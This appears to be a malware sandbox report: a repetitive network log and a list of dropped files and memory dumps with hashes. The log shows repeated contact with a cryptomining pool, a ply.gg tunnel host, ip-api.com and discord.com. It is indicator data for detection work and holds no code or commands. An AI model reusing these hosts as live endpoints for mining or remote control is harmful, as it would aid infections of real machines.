US 8.8.8.8:53 30.178.252.5.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
N/A 127.0.0.1:28223 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 unknown-sunglasses.gl.at.ply.gg udp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 20.221.185.147.in-addr.arpa udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
N/A 127.0.0.1:28223 tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
N/A 127.0.0.1:28223 tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
N/A 127.0.0.1:28223 tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 52.25.243.81:443 shavar.services.mozilla.com tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 34.117.188.166:443 contile.services.mozilla.com udp
US 8.8.8.8:53 166.188.117.34.in-addr.arpa udp
US 8.8.8.8:53 81.243.25.52.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
GB 142.250.187.196:443 www.google.com udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 unknown-sunglasses.gl.at.ply.gg udp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
N/A 127.0.0.1:64843 tcp
N/A 127.0.0.1:64860 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
N/A 127.0.0.1:28223 tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
N/A 127.0.0.1:28223 tcp
US 8.8.8.8:53 ip-api.com udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp

Files


memory/3168-2143-0x0000000140000000-0x0000000140848000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 acb49a26ee1391c0a6d94e6ce9923724
SHA1 f1cc01f3a7b63d3b33ca973375beea3e40a9d572
SHA256 3935dec2ef5409766cf2bd73d882e2f42b600120acdc279af71ad0f1bc0d20ab
SHA512 960241f8e490dc102f54d02fa1eb7097146c357a3b0671cb0c8599c57ff168d3c1106ad08b025beefaa88066194c6ecc605a3fe33f8bbd0e1a7d3f4012f2e001

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c66a404f582bbc94cfbe56951252fc1f
SHA1 a059037aac786c88a146ee79c26c51dec5167719
SHA256 6e91b91e452b9f183b853f22158776ef30e9a9d5ea4cbfe04708a1e02dd7f544
SHA512 0fd13a687eb160de7147b422fd0590a7295587137a5f313c18e7eb9a416ee50623fc261b9ea067c39719b8a8975cdffb814f227b522f40adb3a9fb9c12fb64b4

C:\Users\Admin\AppData\Local\Temp\M5C14TA8IIgJOMO

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Temp\XgioIMSbRldb5Zt

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\Zdm2CuG9XfewDBh\Display\Display.png

MD5 3fc01cb173534ebad311dcd0830ec0fc
SHA1 8487126730547020fc80c98a57d92b9642873e10
SHA256 06f7032c633c418491373fac4d5a23cdbe1a6a37822abea7c42270806863286d
SHA512 647fe1ccb371dea5f52d57373987ee2047a44423d36f340b1a36fd9596e509159c733fefd24c271668a49f40936fc0148c7ccb79334872263ed91c7bf076019c

memory/4940-3038-0x00000146B9FF0000-0x00000146BA0A9000-memory.dmp

memory/2052-4173-0x000002A439970000-0x000002A439A29000-memory.dmp

memory/5000-4646-0x0000000000B00000-0x0000000000B40000-memory.dmp

memory/5000-4647-0x0000000001700000-0x000000000171A000-memory.dmp

memory/5000-4648-0x0000000005C60000-0x0000000005DBA000-memory.dmp

memory/1104-5525-0x000001D120770000-0x000001D120829000-memory.dmp

memory/4360-6689-0x0000022369E10000-0x0000022369EC9000-memory.dmp

